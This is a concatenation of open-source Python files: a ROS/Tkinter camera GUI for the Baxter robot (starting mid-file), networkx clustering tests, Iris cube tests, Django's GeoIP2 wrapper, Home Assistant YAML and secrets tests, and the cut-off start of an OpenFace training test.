ori_y = (400 - rect_h)//2
draw = ImageDraw.Draw(self.imageB)
draw.rectangle( ((ori_x, ori_y), (ori_x + rect_w, ori_y + rect_h)), outline="red")
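        # hedged arithmetic note (added comment): with max_screen_res =
        # (1024, 600) and 0.75**2 = 0.5625, the box is 576 x 337.5 px,
        # placed at origin (32, 31.0) inside the 640 x 400 preview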
def snapshot(self):
'''
take snapshot and save file
'''
#save to files
self.save_file()
#update panelA with captured image
self.imageATk = ImageTk.PhotoImage(self.imageB)
self.panelA.config(image=self.imageATk)
def get_joint_position(self, limb, des_pose):
'''
return a list of joint rotation angles
:param limb: left or right
:param pose: geometry_msgs.pose
'''
ns = "ExternalTools/" + limb + "/PositionKinematicsNode/IKService"
iksvc = rospy.ServiceProxy(ns, SolvePositionIK)
ikreq = SolvePositionIKRequest()
hdr = Header(stamp=rospy.Time.now(), frame_id='base')
poseMsg = PoseStamped(
header=hdr,
pose=copy.deepcopy(des_pose)
)
ikreq.pose_stamp.append(poseMsg)
try:
rospy.wait_for_service(ns, 5.0)
resp = iksvc(ikreq)
except (rospy.ServiceException, rospy.ROSException), e:
rospy.logerr("Service call failed: %s" % (e,))
return None
# Check if result valid, and type of seed ultimately used to get solution
# convert rospy's string representation of uint8[]'s to int's
resp_seeds = struct.unpack('<%dB' % len(resp.result_type),
resp.result_type)
        if (resp_seeds[0] != resp.RESULT_INVALID):
            seed_str = {
                ikreq.SEED_USER: 'User Provided Seed',
                ikreq.SEED_CURRENT: 'Current Joint Angles',
                ikreq.SEED_NS_MAP: 'Nullspace Setpoints',
            }.get(resp_seeds[0], 'None')
            print("SUCCESS - Valid Joint Solution Found from Seed Type: %s" %
                  (seed_str,))
        else:
            print("INVALID POSE - No Valid Joint Solution Found.")
            # callers treat a None result as "unreachable pose", so bail
            # out instead of returning a meaningless joint mapping
            return None
        return dict(zip(resp.joints[0].name, resp.joints[0].position))
def move_arm(self):
'''
move baxter arm to position for snapshot
'''
global cam_pose, limb
joint_angles = self.get_joint_position("left", cam_pose)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.0018)
def select_path(self):
global path, prefix
path = tkFileDialog.askdirectory(parent=root, initialdir='.')
print "get path" + str(path)
self.stbar.update()
def select_prefix(self):
global path, prefix
prefix = tkSimpleDialog.askstring(title="select a prefix", prompt="the saved file will look like " + prefix + "_xx")
self.stbar.update()
def save_file(self):
'''
        save file to the selected directory, using the selected prefix for
        the file name. The saved file name looks like [prefix]_xx, where
        xx is a two-digit serial number.
'''
global path, prefix
# find the pre-existing file with largest serial number
last_sn = 0
head = None
tail = ".png" # save a .png file by default
fullstr = path + '/' + prefix + '_[0-9]*.png'
for fn in glob.glob(fullstr):
full_name = os.path.split(fn)[1]
head, tail = os.path.splitext(full_name)
sn = head.split('_')[1]
if last_sn < int(sn):
last_sn = int(sn)
new_fn = prefix + '_' + str(last_sn + 1).zfill(2) + tail
new_full_fn = path + '/' + new_fn
print "saved as" + new_full_fn
#crop and resize image for baxter head screen resolution 1024 x 600
rect_w, rect_h = tuple(int(n * pow(0.75, self.res_mode)) for n in self.max_screen_res)
ori_x = (self.camera.cam_proxy.resolution[0] - rect_w)//2
ori_y = (self.camera.cam_proxy.resolution[1] - rect_h)//2
imageB_crop = self.imageB.crop((ori_x, ori_y, ori_x+rect_w, ori_y+rect_h)).resize(self.max_screen_res)
#make a stamp
draw = ImageDraw.Draw(imageB_crop)
draw.text( (20, 20), new_fn, anchor='w')
imageB_crop.save(new_full_fn)
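    @staticmethod
    def _demo_next_serial():
        # Hedged sketch (added illustration) of the serial-number scan in
        # save_file() above, on hypothetical file names: the next snapshot
        # becomes img_08.png.
        existing = ['img_01.png', 'img_07.png']
        last_sn = 0
        tail = ".png"
        for full_name in existing:
            head, tail = os.path.splitext(full_name)
            sn = head.split('_')[1]
            if last_sn < int(sn):
                last_sn = int(sn)
        return 'img_' + str(last_sn + 1).zfill(2) + tail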
def restart_node(self):
'''
Update image path in animation node and restart
This GUI uses the single express animation server
'''
global path
if self.animation_node is not None:
#kill the process
self.animation_node.kill()
#create new animation node with current path
self.animation_node = subprocess.Popen(["rosrun", "baxter_tictactoe", "animator_server.py", path], shell=False)
def onClose(self):
if tkMessageBox.askokcancel("Quit", "Do you really wish to quit? Animation server will be terminated"):
            if self.animation_node is not None and self.animation_node.poll() is None:
# the process is still alive
self.animation_node.terminate()
# never close current camera
root.destroy()
def update_image(self):
'''
        Check the image queue for an incoming camera image.
        By default the camera runs at 25 Hz, so the GUI refresh rate
        should be faster than that.
'''
global img_queue
try:
msg = img_queue.get_nowait()
except Queue.Empty:
root.after(10, self.update_image)
return
try:
self.imageB_cv = self.bridge.imgmsg_to_cv2(msg, "rgb8")
except CvBridgeError as e:
print(e)
self.imageB = Image.fromarray(self.imageB_cv)
self.draw_box()
self.imageBTk = ImageTk.PhotoImage(self.imageB)
self.panelB.config(image=self.imageBTk)
root.after(10, self.update_image)
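        # hedged note (added comment): a 25 Hz camera delivers a frame
        # every 40 ms; re-polling every 10 ms therefore drains the queue
        # faster than frames arrive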
class Cam(object):
"""
represent the selected camera
"""
def __init__(self):
# close the unused camera to allow enough bandwidth
# max 2 cameras allowed at any given time
# uncomment the following lines if can't find related camera service
# CameraController("right_hand_camera").close()
self.cam_proxy = CameraController("left_hand_camera")
# default resolution is 640 x 400
# MODES = [(1280, 800), (960, 600), (640, 400), (480, 300), (384, 240), (320, 200)]
self.res_mode = 2
self.cam_proxy.resolution=CameraController.MODES[self.res_mode]
# open camera by default
self.cam_proxy.open()
def change_cam_to(self, id):
        if id == self.cam_proxy._id:
# same camera, do nothing
return
if self.cam_proxy._open == True:
# close camera in use
self.cam_proxy.close()
# create new camera controller
        self.cam_proxy = CameraController(id)
        # open new camera
        self.cam_proxy.open()
def change_resolution(self, mode_id):
if CameraController.MODES[mode_id] == self.cam_proxy.resolution:
#nothing to do
return
        # update resolution; resolution is a property, so assign to it
        # (calling it, as before, would raise a TypeError)
        self.cam_proxy.resolution = CameraController.MODES[mode_id]
def close(self):
self.cam_proxy.close()
def image_callback(data):
global img_queue
#feed in data to the FIFO queue
img_queue.put_nowait(data)
#print "image callback invoked"
def listening():
'''
The listener to the camera image topic.
'''
#rospy.init_node('woz_listener', anonymous=True)
sub = rospy.Subscriber("/cameras/left_hand_camera/image", ImageMsg, image_callback)
rospy.spin()
path = os.path.dirname(os.path.abspath(__file__)) # the saving path for snapshots
prefix = "img" # the prefix for saved files
img_queue = Queue.Queue() # the global queue used to pass on image to Tkinter
rospy.init_node('cam_gui', anonymous=True)
root = tk.Tk()
root.title("Camera GUI")
gui = MainWin(root)
root.protocol("WM_DELETE_WINDOW", gui.onClose)
# initialize limb interface
limb = Limb('left')
cam_pose = Pose(position=Point(x=0.548, y=0.890, z=0.095),
orientation=Quaternion(x=0, y=1, z=0, w=0))
# change the selfie pose to an appropriate value
selfie_pose = Pose(position=Point(x=0.4, y=0.30, z=0.55),
orientation=Quaternion(x=-0.416, y=0.580, z=-0.689, w=0.125))
#start listener thread
lthread = threading.Thread(target=listening, args=[])
lthread.setDaemon(True)
lthread.start()
# schedule the first update_image event in the mainloop
root.after(10, gui.update_image)
root.mainloop()
|
apache-2.0
|
cogeorg/BlackRhino
|
examples/firesales_simple/networkx/algorithms/tests/test_cluster.py
|
89
|
7321
|
#!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestTriangles:
def test_empty(self):
G = nx.Graph()
assert_equal(list(nx.triangles(G).values()),[])
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.triangles(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.triangles(G),
{0: 0, 1: 0, 2: 0, 3: 0, 4: 0,
5: 0, 6: 0, 7: 0, 8: 0, 9: 0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.triangles(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.triangles(G,1),0)
assert_equal(list(nx.triangles(G,[1,2]).values()),[0, 0])
assert_equal(nx.triangles(G,1),0)
assert_equal(nx.triangles(G,[1,2]),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.triangles(G).values()),[6, 6, 6, 6, 6])
assert_equal(sum(nx.triangles(G).values())/3.0,10)
assert_equal(nx.triangles(G,1),6)
G.remove_edge(1,2)
assert_equal(list(nx.triangles(G).values()),[5, 3, 3, 5, 5])
assert_equal(nx.triangles(G,1),3)
class TestWeightedClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.clustering(G,weight='weight').values()),[])
assert_equal(nx.clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.clustering(G,weight='weight').values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.clustering(G,weight='weight'),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.clustering(G,weight='weight').values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(list(nx.clustering(G,[1,2],weight='weight').values()),[0, 0])
assert_equal(nx.clustering(G,1,weight='weight'),0)
assert_equal(nx.clustering(G,[1,2],weight='weight'),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.clustering(G,weight='weight').values()),[1, 1, 1, 1, 1])
assert_equal(nx.average_clustering(G,weight='weight'),1)
G.remove_edge(1,2)
assert_equal(list(nx.clustering(G,weight='weight').values()),
[5./6., 1.0, 1.0, 5./6., 5./6.])
assert_equal(nx.clustering(G,[1,4],weight='weight'),{1: 1.0, 4: 0.83333333333333337})
def test_triangle_and_edge(self):
G=nx.Graph()
G.add_cycle([0,1,2])
G.add_edge(0,4,weight=2)
assert_equal(nx.clustering(G)[0],1.0/3.0)
assert_equal(nx.clustering(G,weight='weight')[0],1.0/6.0)
class TestClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.clustering(G).values()),[])
assert_equal(nx.clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.clustering(G).values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.clustering(G),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.clustering(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(list(nx.clustering(G,[1,2]).values()),[0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(nx.clustering(G,[1,2]),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.clustering(G).values()),[1, 1, 1, 1, 1])
assert_equal(nx.average_clustering(G),1)
G.remove_edge(1,2)
assert_equal(list(nx.clustering(G).values()),
[5./6., 1.0, 1.0, 5./6., 5./6.])
assert_equal(nx.clustering(G,[1,4]),{1: 1.0, 4: 0.83333333333333337})
class TestTransitivity:
def test_transitivity(self):
G = nx.Graph()
assert_equal(nx.transitivity(G),0.0)
def test_path(self):
G = nx.path_graph(10)
assert_equal(nx.transitivity(G),0.0)
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(nx.transitivity(G),0.0)
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(nx.transitivity(G),1.0)
G.remove_edge(1,2)
assert_equal(nx.transitivity(G),0.875)
# def test_clustering_transitivity(self):
# # check that weighted average of clustering is transitivity
# G = nx.complete_graph(5)
# G.remove_edge(1,2)
# t1=nx.transitivity(G)
# (cluster_d2,weights)=nx.clustering(G,weights=True)
# trans=[]
# for v in G.nodes():
# trans.append(cluster_d2[v]*weights[v])
# t2=sum(trans)
# assert_almost_equal(abs(t1-t2),0)
class TestSquareClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.square_clustering(G).values()),[])
assert_equal(nx.square_clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.square_clustering(G).values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.square_clustering(G),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.square_clustering(G).values()),
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5])
assert_equal(list(nx.square_clustering(G,[1,2]).values()),[0.5, 0.5])
assert_equal(nx.square_clustering(G,[1])[1],0.5)
assert_equal(nx.square_clustering(G,[1,2]),{1: 0.5, 2: 0.5})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.square_clustering(G).values()),[1, 1, 1, 1, 1])
def test_bipartite_k5(self):
G = nx.complete_bipartite_graph(5,5)
assert_equal(list(nx.square_clustering(G).values()),
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
def test_lind_square_clustering(self):
"""Test C4 for figure 1 Lind et al (2005)"""
G = nx.Graph([(1,2),(1,3),(1,6),(1,7),(2,4),(2,5),
(3,4),(3,5),(6,7),(7,8),(6,8),(7,9),
(7,10),(6,11),(6,12),(2,13),(2,14),(3,15),(3,16)])
G1 = G.subgraph([1,2,3,4,5,13,14,15,16])
G2 = G.subgraph([1,6,7,8,9,10,11,12])
assert_equal(nx.square_clustering(G, [1])[1], 3/75.0)
assert_equal(nx.square_clustering(G1, [1])[1], 2/6.0)
assert_equal(nx.square_clustering(G2, [1])[1], 1/5.0)
def test_average_clustering():
G=nx.cycle_graph(3)
G.add_edge(2,3)
assert_equal(nx.average_clustering(G),(1+1+1/3.0)/4.0)
assert_equal(nx.average_clustering(G,count_zeros=True),(1+1+1/3.0)/4.0)
assert_equal(nx.average_clustering(G,count_zeros=False),(1+1+1/3.0)/3.0)
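# Hedged reference note (added comment, not from the original test suite):
# for the K5-minus-edge cases above, node 0 keeps degree 4 and 5 triangles,
# so its local clustering is 5 / (4*3/2) = 5/6, matching the expected
# [5./6., 1.0, 1.0, 5./6., 5./6.] values.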
|
gpl-3.0
|
pp-mo/iris
|
lib/iris/tests/integration/test_cube.py
|
5
|
2218
|
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Integration tests for :class:`iris.cube.Cube`."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
from iris.analysis import MEAN
from iris.cube import Cube
from iris._lazy_data import is_lazy_data, as_lazy_data
class Test_aggregated_by(tests.IrisTest):
@tests.skip_data
def test_agg_by_aux_coord(self):
problem_test_file = tests.get_data_path(
("NetCDF", "testing", "small_theta_colpex.nc")
)
cube = iris.load_cube(problem_test_file, "air_potential_temperature")
# Test aggregating by aux coord, notably the `forecast_period` aux
# coord on `cube`, whose `_points` attribute is a lazy array.
# This test then ensures that aggregating using `points` instead is
# successful.
# First confirm we've got a lazy array.
# NB. This checks the merge process in `load_cube()` hasn't
# triggered the load of the coordinate's data.
forecast_period_coord = cube.coord("forecast_period")
self.assertTrue(is_lazy_data(forecast_period_coord.core_points()))
# Now confirm we can aggregate along this coord.
res_cube = cube.aggregated_by("forecast_period", MEAN)
res_cell_methods = res_cube.cell_methods[0]
self.assertEqual(res_cell_methods.coord_names, ("forecast_period",))
self.assertEqual(res_cell_methods.method, "mean")
class TestDataFillValue(tests.IrisTest):
def test_real(self):
data = np.ma.masked_array([1, 2, 3], [0, 1, 0], fill_value=10)
cube = Cube(data)
cube.data.fill_value = 20
self.assertEqual(cube.data.fill_value, 20)
def test_lazy(self):
data = np.ma.masked_array([1, 2, 3], [0, 1, 0], fill_value=10)
data = as_lazy_data(data)
cube = Cube(data)
cube.data.fill_value = 20
self.assertEqual(cube.data.fill_value, 20)
if __name__ == "__main__":
tests.main()
|
lgpl-3.0
|
zerc/django
|
django/contrib/gis/geoip2/base.py
|
335
|
9054
|
import os
import socket
import geoip2.database
from django.conf import settings
from django.core.validators import ipv4_re
from django.utils import six
from django.utils.ipv6 import is_valid_ipv6_address
from .resources import City, Country
# Creating the settings dictionary with any settings, if needed.
GEOIP_SETTINGS = {
'GEOIP_PATH': getattr(settings, 'GEOIP_PATH', None),
'GEOIP_CITY': getattr(settings, 'GEOIP_CITY', 'GeoLite2-City.mmdb'),
'GEOIP_COUNTRY': getattr(settings, 'GEOIP_COUNTRY', 'GeoLite2-Country.mmdb'),
}
class GeoIP2Exception(Exception):
pass
class GeoIP2(object):
# The flags for GeoIP memory caching.
# Try MODE_MMAP_EXT, MODE_MMAP, MODE_FILE in that order.
MODE_AUTO = 0
# Use the C extension with memory map.
MODE_MMAP_EXT = 1
# Read from memory map. Pure Python.
MODE_MMAP = 2
# Read database as standard file. Pure Python.
MODE_FILE = 4
# Load database into memory. Pure Python.
MODE_MEMORY = 8
cache_options = {opt: None for opt in (0, 1, 2, 4, 8)}
# Paths to the city & country binary databases.
_city_file = ''
_country_file = ''
# Initially, pointers to GeoIP file references are NULL.
_city = None
_country = None
def __init__(self, path=None, cache=0, country=None, city=None):
"""
Initialize the GeoIP object. No parameters are required to use default
settings. Keyword arguments may be passed in to customize the locations
of the GeoIP datasets.
* path: Base directory to where GeoIP data is located or the full path
to where the city or country data files (*.mmdb) are located.
Assumes that both the city and country data sets are located in
this directory; overrides the GEOIP_PATH setting.
* cache: The cache settings when opening up the GeoIP datasets. May be
an integer in (0, 1, 2, 4, 8) corresponding to the MODE_AUTO,
MODE_MMAP_EXT, MODE_MMAP, MODE_FILE, and MODE_MEMORY,
`GeoIPOptions` C API settings, respectively. Defaults to 0,
meaning MODE_AUTO.
* country: The name of the GeoIP country data file. Defaults to
'GeoLite2-Country.mmdb'; overrides the GEOIP_COUNTRY setting.
* city: The name of the GeoIP city data file. Defaults to
'GeoLite2-City.mmdb'; overrides the GEOIP_CITY setting.
"""
# Checking the given cache option.
if cache in self.cache_options:
self._cache = cache
else:
raise GeoIP2Exception('Invalid GeoIP caching option: %s' % cache)
# Getting the GeoIP data path.
if not path:
path = GEOIP_SETTINGS['GEOIP_PATH']
if not path:
raise GeoIP2Exception('GeoIP path must be provided via parameter or the GEOIP_PATH setting.')
if not isinstance(path, six.string_types):
raise TypeError('Invalid path type: %s' % type(path).__name__)
if os.path.isdir(path):
# Constructing the GeoIP database filenames using the settings
# dictionary. If the database files for the GeoLite country
# and/or city datasets exist, then try to open them.
country_db = os.path.join(path, country or GEOIP_SETTINGS['GEOIP_COUNTRY'])
if os.path.isfile(country_db):
self._country = geoip2.database.Reader(country_db, mode=cache)
self._country_file = country_db
city_db = os.path.join(path, city or GEOIP_SETTINGS['GEOIP_CITY'])
if os.path.isfile(city_db):
self._city = geoip2.database.Reader(city_db, mode=cache)
self._city_file = city_db
elif os.path.isfile(path):
# Otherwise, some detective work will be needed to figure out
# whether the given database path is for the GeoIP country or city
# databases.
reader = geoip2.database.Reader(path, mode=cache)
db_type = reader.metadata().database_type
if db_type.endswith('City'):
# GeoLite City database detected.
self._city = reader
self._city_file = path
elif db_type.endswith('Country'):
# GeoIP Country database detected.
self._country = reader
self._country_file = path
else:
raise GeoIP2Exception('Unable to recognize database edition: %s' % db_type)
else:
raise GeoIP2Exception('GeoIP path must be a valid file or directory.')
@property
def _reader(self):
if self._country:
return self._country
else:
return self._city
@property
def _country_or_city(self):
if self._country:
return self._country.country
else:
return self._city.city
def __del__(self):
# Cleanup any GeoIP file handles lying around.
if self._reader:
self._reader.close()
def __repr__(self):
meta = self._reader.metadata()
version = '[v%s.%s]' % (meta.binary_format_major_version, meta.binary_format_minor_version)
return '<%(cls)s %(version)s _country_file="%(country)s", _city_file="%(city)s">' % {
'cls': self.__class__.__name__,
'version': version,
'country': self._country_file,
'city': self._city_file,
}
def _check_query(self, query, country=False, city=False, city_or_country=False):
"Helper routine for checking the query and database availability."
# Making sure a string was passed in for the query.
if not isinstance(query, six.string_types):
raise TypeError('GeoIP query must be a string, not type %s' % type(query).__name__)
# Extra checks for the existence of country and city databases.
if city_or_country and not (self._country or self._city):
raise GeoIP2Exception('Invalid GeoIP country and city data files.')
elif country and not self._country:
raise GeoIP2Exception('Invalid GeoIP country data file: %s' % self._country_file)
elif city and not self._city:
raise GeoIP2Exception('Invalid GeoIP city data file: %s' % self._city_file)
        # GeoIP2 only accepts IP addresses, so resolve hostname queries
        # before returning the query string back to the caller.
if not (ipv4_re.match(query) or is_valid_ipv6_address(query)):
query = socket.gethostbyname(query)
return query
def city(self, query):
"""
Return a dictionary of city information for the given IP address or
Fully Qualified Domain Name (FQDN). Some information in the dictionary
may be undefined (None).
"""
enc_query = self._check_query(query, city=True)
return City(self._city.city(enc_query))
def country_code(self, query):
"Return the country code for the given IP Address or FQDN."
enc_query = self._check_query(query, city_or_country=True)
return self.country(enc_query)['country_code']
def country_name(self, query):
"Return the country name for the given IP Address or FQDN."
enc_query = self._check_query(query, city_or_country=True)
return self.country(enc_query)['country_name']
def country(self, query):
"""
Return a dictionary with the country code and name when given an
IP address or a Fully Qualified Domain Name (FQDN). For example, both
'24.124.1.80' and 'djangoproject.com' are valid parameters.
"""
# Returning the country code and name
enc_query = self._check_query(query, city_or_country=True)
return Country(self._country_or_city(enc_query))
# #### Coordinate retrieval routines ####
def coords(self, query, ordering=('longitude', 'latitude')):
cdict = self.city(query)
if cdict is None:
return None
else:
return tuple(cdict[o] for o in ordering)
def lon_lat(self, query):
"Return a tuple of the (longitude, latitude) for the given query."
return self.coords(query)
def lat_lon(self, query):
"Return a tuple of the (latitude, longitude) for the given query."
return self.coords(query, ('latitude', 'longitude'))
def geos(self, query):
"Return a GEOS Point object for the given query."
ll = self.lon_lat(query)
if ll:
from django.contrib.gis.geos import Point
return Point(ll, srid=4326)
else:
return None
# #### GeoIP Database Information Routines ####
@property
def info(self):
"Return information about the GeoIP library and databases in use."
meta = self._reader.metadata()
return 'GeoIP Library:\n\t%s.%s\n' % (meta.binary_format_major_version, meta.binary_format_minor_version)
@classmethod
def open(cls, full_path, cache):
return GeoIP2(full_path, cache)
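# Hedged usage sketch (added illustration, not part of the original module):
# assuming the GeoLite2 ``.mmdb`` files live under GEOIP_PATH, typical
# lookups with the class above look like this; the IP and hostname are the
# illustrative values from the country() docstring.
#
#   g = GeoIP2()
#   g.country('djangoproject.com')   # {'country_code': ..., 'country_name': ...}
#   g.city('24.124.1.80')            # dict of city information (may contain None)
#   g.lat_lon('24.124.1.80')         # (latitude, longitude) tuple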
|
bsd-3-clause
|
Julian/home-assistant
|
tests/util/test_yaml.py
|
5
|
8377
|
"""Test Home Assistant yaml loader."""
import io
import unittest
import os
import tempfile
from homeassistant.util import yaml
import homeassistant.config as config_util
from tests.common import get_test_config_dir
class TestYaml(unittest.TestCase):
"""Test util.yaml loader."""
def test_simple_list(self):
"""Test simple list."""
conf = "config:\n - simple\n - list"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['config'] == ["simple", "list"]
def test_simple_dict(self):
"""Test simple dict."""
conf = "key: value"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['key'] == 'value'
def test_duplicate_key(self):
"""Test simple dict."""
conf = "key: thing1\nkey: thing2"
try:
with io.StringIO(conf) as f:
yaml.yaml.safe_load(f)
except Exception:
pass
else:
assert 0
    def test_environment_variable(self):
        """Test config file with environment variable."""
os.environ["PASSWORD"] = "secret_password"
conf = "password: !env_var PASSWORD"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc['password'] == "secret_password"
del os.environ["PASSWORD"]
    def test_invalid_environment_variable(self):
        """Test config file with no environment variable set."""
conf = "password: !env_var PASSWORD"
try:
with io.StringIO(conf) as f:
yaml.yaml.safe_load(f)
except Exception:
pass
else:
assert 0
def test_include_yaml(self):
"""Test include yaml."""
with tempfile.NamedTemporaryFile() as include_file:
include_file.write(b"value")
include_file.seek(0)
conf = "key: !include {}".format(include_file.name)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == "value"
def test_include_dir_list(self):
"""Test include dir list yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"two")
file_2.close()
conf = "key: !include_dir_list {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert sorted(doc["key"]) == sorted(["one", "two"])
def test_include_dir_named(self):
"""Test include dir named yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"two")
file_2.close()
conf = "key: !include_dir_named {}".format(include_dir)
correct = {}
correct[os.path.splitext(os.path.basename(file_1.name))[0]] = "one"
correct[os.path.splitext(os.path.basename(file_2.name))[0]] = "two"
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == correct
def test_include_dir_merge_list(self):
"""Test include dir merge list yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"- one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"- two\n- three")
file_2.close()
conf = "key: !include_dir_merge_list {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert sorted(doc["key"]) == sorted(["one", "two", "three"])
def test_include_dir_merge_named(self):
"""Test include dir merge named yaml."""
with tempfile.TemporaryDirectory() as include_dir:
file_1 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_1.write(b"key1: one")
file_1.close()
file_2 = tempfile.NamedTemporaryFile(dir=include_dir,
suffix=".yaml", delete=False)
file_2.write(b"key2: two\nkey3: three")
file_2.close()
conf = "key: !include_dir_merge_named {}".format(include_dir)
with io.StringIO(conf) as f:
doc = yaml.yaml.safe_load(f)
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three"
}
def load_yaml(fname, string):
"""Write a string to file and return the parsed yaml."""
with open(fname, 'w') as file:
file.write(string)
return config_util.load_yaml_config_file(fname)
class FakeKeyring():
"""Fake a keyring class."""
def __init__(self, secrets_dict):
"""Store keyring dictionary."""
self._secrets = secrets_dict
# pylint: disable=protected-access
def get_password(self, domain, name):
"""Retrieve password."""
assert domain == yaml._SECRET_NAMESPACE
return self._secrets.get(name)
class TestSecrets(unittest.TestCase):
"""Test the secrets parameter in the yaml utility."""
def setUp(self): # pylint: disable=invalid-name
"""Create & load secrets file."""
config_dir = get_test_config_dir()
self._yaml_path = os.path.join(config_dir,
config_util.YAML_CONFIG_FILE)
self._secret_path = os.path.join(config_dir, 'secrets.yaml')
load_yaml(self._secret_path,
'http_pw: pwhttp\n'
'comp1_un: un1\n'
'comp1_pw: pw1\n'
'stale_pw: not_used\n'
'logger: debug\n')
self._yaml = load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def tearDown(self): # pylint: disable=invalid-name
"""Clean up secrets."""
for path in [self._yaml_path, self._secret_path]:
if os.path.isfile(path):
os.remove(path)
def test_secrets_from_yaml(self):
"""Did secrets load ok."""
expected = {'api_password': 'pwhttp'}
self.assertEqual(expected, self._yaml['http'])
expected = {
'username': 'un1',
'password': 'pw1'}
self.assertEqual(expected, self._yaml['component'])
def test_secrets_keyring(self):
"""Test keyring fallback & get_password."""
yaml.keyring = None # Ensure it's not there
yaml_str = 'http:\n api_password: !secret http_pw_keyring'
with self.assertRaises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, yaml_str)
yaml.keyring = FakeKeyring({'http_pw_keyring': 'yeah'})
_yaml = load_yaml(self._yaml_path, yaml_str)
self.assertEqual({'http': {'api_password': 'yeah'}}, _yaml)
def test_secrets_logger_removed(self):
"""Ensure logger: debug was removed."""
with self.assertRaises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, 'api_password: !secret logger')
|
mit
|
xinfang/face-recognize
|
tests/openface_neural_net_training_tests.py
|
5
|
3071
|
# OpenFace training tests.
#
# Copyright 2015-2016 Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import sys
import numpy as np
np.set_printoptions(precision=2)
import pandas as pd
import tempfile
from subprocess import Popen, PIPE
openfaceDir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
modelDir = os.path.join(openfaceDir, 'models')
exampleImages = os.path.join(openfaceDir, 'images', 'examples')
lfwSubset = os.path.join(openfaceDir, 'data', 'lfw-subset')
def test_dnn_training():
assert os.path.isdir(
